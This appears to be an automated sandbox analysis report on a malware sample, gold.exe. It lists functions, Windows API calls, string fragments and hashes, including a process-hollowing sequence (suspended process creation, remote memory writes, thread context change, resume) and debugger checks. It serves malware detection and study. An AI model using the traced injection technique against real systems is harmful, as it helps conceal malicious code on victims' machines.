Function 077748FC Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2406687762.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7770000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef53e3d30a2b3861e5e46299e80fc02758f1e3ee7748db595db7c5b8f42bed17
Instruction ID: 2f2585c3a5f635a035656ef0f297fdb386a9178a5129d6787f7e07f0a0ba1d70
Opcode Fuzzy Hash: ef53e3d30a2b3861e5e46299e80fc02758f1e3ee7748db595db7c5b8f42bed17
Instruction Fuzzy Hash: E0F0C9B0C4439ACFDF248F54D898BBEBA70AB06359F101555C016B3290CBB40A84CF89

Analysis Process: gold.exePID: 3608, Parent PID: 6024COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0.5%
Signature Coverage:	1.2%
Total number of Nodes:	1520
Total number of Limit Nodes:	50

Executed Functions

Function 00BE018D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00BE02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00BE030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00BE032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BE0351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00BE037C
TerminateProcess.KERNELBASE(?,00000000), ref: 00BE039B
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00BE03D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00BE041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BE045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 00BE0499
ResumeThread.KERNELBASE(?), ref: 00BE04A8

Strings

ress, xrefs: 00BE0217
Load, xrefs: 00BE01CB
aryA, xrefs: 00BE01D3
GetP, xrefs: 00BE020F

Memory Dump Source

Source File: 00000005.00000002.2108645855.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_be0000_gold.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: GetP$Load$aryA$ress
API String ID: 2440066154-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 4b4183430162a043e11147c61533f09fca5556ab813612fcaabbc5109b7f8980
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 01B1E57260028AAFDB60CF69CC80BDA77E5FF88714F158564EA0CAB341D774FA418B94

Function 009E53C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 67
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 009E53DD

Part of subcall function 009E2241: _strlen.LIBCMT ref: 009E2259

_strlen.LIBCMT ref: 009E53F8
_strlen.LIBCMT ref: 009E540E
GetProcAddress.KERNEL32(00000000,?), ref: 009E542B
DeleteAce.ADVAPI32(00000000,00000000), ref: 009E5455

Strings

kernel32.dll, xrefs: 009E53D8
Free, xrefs: 009E53E3
SVWj@h, xrefs: 009E543C
Cons, xrefs: 009E53F2, 009E53F7, 009E53FF
ole, xrefs: 009E5408, 009E540D, 009E5415

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: _strlen$AddressDeleteHandleModuleProc
String ID: Cons$Free$SVWj@h$kernel32.dll$ole
API String ID: 4280323364-3241830502
Opcode ID: 68a13528c4640a70c0c93504d70382b58ee232d7d6182fe8378cb1180e871482
Instruction ID: 8e152c167985710a0d0763bcaa19dffe01e33591e924806a74d9835232036a9e
Opcode Fuzzy Hash: 68a13528c4640a70c0c93504d70382b58ee232d7d6182fe8378cb1180e871482
Instruction Fuzzy Hash: 8F11AF71E00248ABCB15EBA1EC46FFE77B8EF84710F104129E411A71E1EA74BE46C661

Function 009F770E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,009F781B,00000000,009F65C9,00000000,00000000,?,?,009F7A45,00000021,FlsSetValue,00A0B3E0,00A0B3E8,00000000), ref: 009F77CF

Strings

api-ms-, xrefs: 009F7765
ext-ms-, xrefs: 009F7779

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 744e8df12bed5039283f8196681a1d78d0372b0e644ca4cb7c588aa2395e6e13
Instruction ID: 8a8be0ed797bdc07aa9a42d0d437d73c184450b0cfbce6894dcab0fab6ea4452
Opcode Fuzzy Hash: 744e8df12bed5039283f8196681a1d78d0372b0e644ca4cb7c588aa2395e6e13
Instruction Fuzzy Hash: D5212771A1A319ABD721EBE49C44E7BB76CAB41770F210110EB06A7290EB74ED02C7E0

Function 009E527D Relevance: 4.5, APIs: 3, Instructions: 34
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 009E5290
CreateThread.KERNELBASE(00000000,00000000,00000188,00A13030,00000000,00000000), ref: 009E52C1
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 009E52CB

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: AllocCreateObjectSingleThreadVirtualWait
String ID:
API String ID: 2947710671-0
Opcode ID: 3f2ccc7e3d09bdb2caf4c604226bd8325ba4bed6e68ad5b0f0913b0eb48f2d83
Instruction ID: 7259547a8ec9045a3b33a5f81f46fab7ba219af9395e482871207a7f2fe47fe5
Opcode Fuzzy Hash: 3f2ccc7e3d09bdb2caf4c604226bd8325ba4bed6e68ad5b0f0913b0eb48f2d83
Instruction Fuzzy Hash: 40E09BF1A043587FE5216BF15CC9FEB261CD7C57F5F000620F616510D1C5745D458175

Function 009F4966 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,009F4960,?,?,?,?,E6A741B3), ref: 009F4977
TerminateProcess.KERNEL32(00000000,?,009F4960,?,?,?,?,E6A741B3), ref: 009F497E
ExitProcess.KERNEL32 ref: 009F4990

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 28d9b224fea48b29da31631ee109213d5f5448ab1a0a2e4c60120f7efd820952
Instruction ID: 246d6ff5411057a13fe150656086915d3839d4722c198a7a8b82f3cb07506d5e
Opcode Fuzzy Hash: 28d9b224fea48b29da31631ee109213d5f5448ab1a0a2e4c60120f7efd820952
Instruction Fuzzy Hash: 85D09E3150414CABCF016FA4EC0D96F3F2AAF407557448110BA0945031DF71AAA3DB61

Function 009E7011 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009E6F72: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,009E6FC4,00000000,?,009E7005,00000000,?,009E4225,00000000), ref: 009E6F7E

FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,E6A741B3,?,?,?,00A0664D,000000FF), ref: 009E7078

Part of subcall function 009E4EF8: std::_Throw_Cpp_error.LIBCPMT ref: 009E4F19

Part of subcall function 009E619E: ReleaseSRWLockExclusive.KERNEL32(009E3E12,?,009E3E1A,?,?,?,?,?,?,?,?,?,?,?,?,009E1342), ref: 009E61B2

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
String ID:
API String ID: 3627539351-0
Opcode ID: 6f11e4c424dd21e4f3b6517eb29662692165c20289752c21c8ff18cbeaa1a24d
Instruction ID: 765ebb866cee966e2355c895b229024740e4b2e6aa86a4f9c674928129108b95
Opcode Fuzzy Hash: 6f11e4c424dd21e4f3b6517eb29662692165c20289752c21c8ff18cbeaa1a24d
Instruction Fuzzy Hash: BB112E32608684AFCB27ABA6EC11F2EB779FF917A1F10051EF81597291CB75EC018751

Function 009F77D9 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816e5e463fe76c1741a00f081c31893bef772bb00fb8cc84613a7ea3d275a127
Instruction ID: 4ae340177c181ce881d53e307687c53d468e0dcfcefcb86ceb5638300fa1106f
Opcode Fuzzy Hash: 816e5e463fe76c1741a00f081c31893bef772bb00fb8cc84613a7ea3d275a127
Instruction Fuzzy Hash: 4C01F5336082195F9B22DEE9EC8996A73ABFBC53707248125FB15CB184EA31D841C790

Non-executed Functions

Function 00A008F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00A00C11,00000002,00000000,?,?,?,00A00C11,?,00000000), ref: 00A0098C
GetLocaleInfoW.KERNEL32(00000000,20001004,00A00C11,00000002,00000000,?,?,?,00A00C11,?,00000000), ref: 00A009B5
GetACP.KERNEL32(?,?,00A00C11,?,00000000), ref: 00A009CA

Strings

OCP, xrefs: 00A00947
ACP, xrefs: 00A00911

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: e1ed1a1278b7dc00e2f433b61c88202bb11fac57433d5274c8afa469daf987c8
Instruction ID: b7c6cec40af0099e9a27be54c85aca38b70bcf8233b847e180ff7e7aa865e0f7
Opcode Fuzzy Hash: e1ed1a1278b7dc00e2f433b61c88202bb11fac57433d5274c8afa469daf987c8
Instruction Fuzzy Hash: 7721B63264410CA6FB34CF54E900FA777A6AF90BE4F568525E84AD7193E732DE41C790

Function 00A00AC8 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00A00BD4
IsValidCodePage.KERNEL32(00000000), ref: 00A00C1D
IsValidLocale.KERNEL32(?,00000001), ref: 00A00C2C
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A00C74
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A00C93

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1c8f51612f6f3b7090a67b92ea5f629b8cc45109f2e05edb9c7ae2c6abd85091
Instruction ID: 44fe4c7c79678276bc6519645b6ed6aa85136b655079382e9b47074928f59c77
Opcode Fuzzy Hash: 1c8f51612f6f3b7090a67b92ea5f629b8cc45109f2e05edb9c7ae2c6abd85091
Instruction Fuzzy Hash: 83517D71A0020DABDB10EFA5EC41FBE77B8BF05704F144569A940E71D1EBB09A45CB61

Function 00A00164 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

GetACP.KERNEL32(?,?,?,?,?,?,009F5319,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A00225
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,009F5319,?,?,?,00000055,?,-00000050,?,?), ref: 00A00250
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00A003B3

Strings

utf8, xrefs: 00A00322

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 88f84aef19ca944e44b8dbdbd07685e5254667178ac846caf3b31cbad49f48eb
Instruction ID: e5e14cb7181ec7920b1c74a0d5fcbf493754f82584e63c97aaf42267764378bc
Opcode Fuzzy Hash: 88f84aef19ca944e44b8dbdbd07685e5254667178ac846caf3b31cbad49f48eb
Instruction Fuzzy Hash: 5171D271A0430DABDB25AB74EC86FBA73A8EF59700F144529E605DB1C1FB70E9418762

Function 009F80F2 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 009F817F

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7d3d0efe66d1695338b9613b9120aba3f50c32649be67e04b973d1ace9b72ed7
Instruction ID: 4cc76b308caa7d3d4b173f68c97e96799167bcea7f2e360281096918388afa53
Opcode Fuzzy Hash: 7d3d0efe66d1695338b9613b9120aba3f50c32649be67e04b973d1ace9b72ed7
Instruction Fuzzy Hash: 3AB16932E0464E9FDB158F68C8817FFBBA9EF55350F14816AEA11AB241DA749D01CBA0

Function 009EA55A Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009EA566
IsDebuggerPresent.KERNEL32 ref: 009EA632
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009EA64B
UnhandledExceptionFilter.KERNEL32(?), ref: 009EA655

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: edb783fdea4536402c855dd8f0f7d6dfe384d0e48bf1b07306392d7ea8fd12b9
Instruction ID: 31e982723cd4adb342cd733cf056cd744844dce8a6e654d5c51ec2f342bc8149
Opcode Fuzzy Hash: edb783fdea4536402c855dd8f0f7d6dfe384d0e48bf1b07306392d7ea8fd12b9
Instruction Fuzzy Hash: BA3127B5D0521C9BDF21DFA5D949BCDBBB8AF48300F1041EAE40CAB250EB71AE858F45

Function 00A00577 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A005CB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A00615
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A006DB

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 6acd4160f69626358d9d0e37fdcac2517c6029046dc55d568a11921fc0224393
Instruction ID: 62ab30eaf0beff9ad4728f45242be16be6bcc4397876d378035e1cc898513757
Opcode Fuzzy Hash: 6acd4160f69626358d9d0e37fdcac2517c6029046dc55d568a11921fc0224393
Instruction Fuzzy Hash: CB61D13190060B9FDB28AF24ED82FBA77A9EF44300F104179E945C61C1EB79E995CF50

Function 009EE453 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 009EE54B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 009EE555
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 009EE562

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e6d19bf30d69f993a9bddc7ce6fb95627be1ab6163ec53e0e1ff8d9dc7680846
Instruction ID: 321f1be233941fa32bd157cb1895e40ef4fa7b5d0beaef59ac495c5283aaf374
Opcode Fuzzy Hash: e6d19bf30d69f993a9bddc7ce6fb95627be1ab6163ec53e0e1ff8d9dc7680846
Instruction Fuzzy Hash: 2531C674D0122CABCB21DF65D88978DBBB8BF58310F5041DAE40CA7261EB709F858F55

Function 009FD5E1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1195f8f5c54478de2974d3ca37bdc149f07d8d77c79a445bed7d381e65381c49
Instruction ID: 3269cee3093a790a1de87da5870c142a5e770de95acef0d876fa4fc314719281
Opcode Fuzzy Hash: 1195f8f5c54478de2974d3ca37bdc149f07d8d77c79a445bed7d381e65381c49
Instruction Fuzzy Hash: 5341C2B580521DAFDF20EF69CC89ABABBBDAF45304F1442D9E50DD3201EA359E858F50

Function 00A007CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A0081E

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1bb507110049c97f18ceedbc3e12a5d3963c579ed3b99b862651fd940f48162e
Instruction ID: c3138d0c8d215c84070f7f07adb4df0454584675961abd637cc5bfe5b281747c
Opcode Fuzzy Hash: 1bb507110049c97f18ceedbc3e12a5d3963c579ed3b99b862651fd940f48162e
Instruction Fuzzy Hash: 2321A47261520AABDB28AF25EC42FBB77A8FF44310F10407AFD05D6181EB75ED498790

Function 00A00451 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

EnumSystemLocalesW.KERNEL32(00A00577,00000001,00000000,?,-00000050,?,00A00BA8,00000000,?,?,?,00000055,?), ref: 00A004C3

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 708835dc6d255ee94d5489af34cf93260f9ed99f3f6ca17f4cbc6d75a86c0ef5
Instruction ID: cfaa3b9f1b58941ca988c5afe0f0a454cd90a561ce3ee28a72b7fcd03d3f0e19
Opcode Fuzzy Hash: 708835dc6d255ee94d5489af34cf93260f9ed99f3f6ca17f4cbc6d75a86c0ef5
Instruction Fuzzy Hash: 8D11EC366047095FDB189F39D891ABA7791FF84758F15442DDA8647A80D372B943CB40

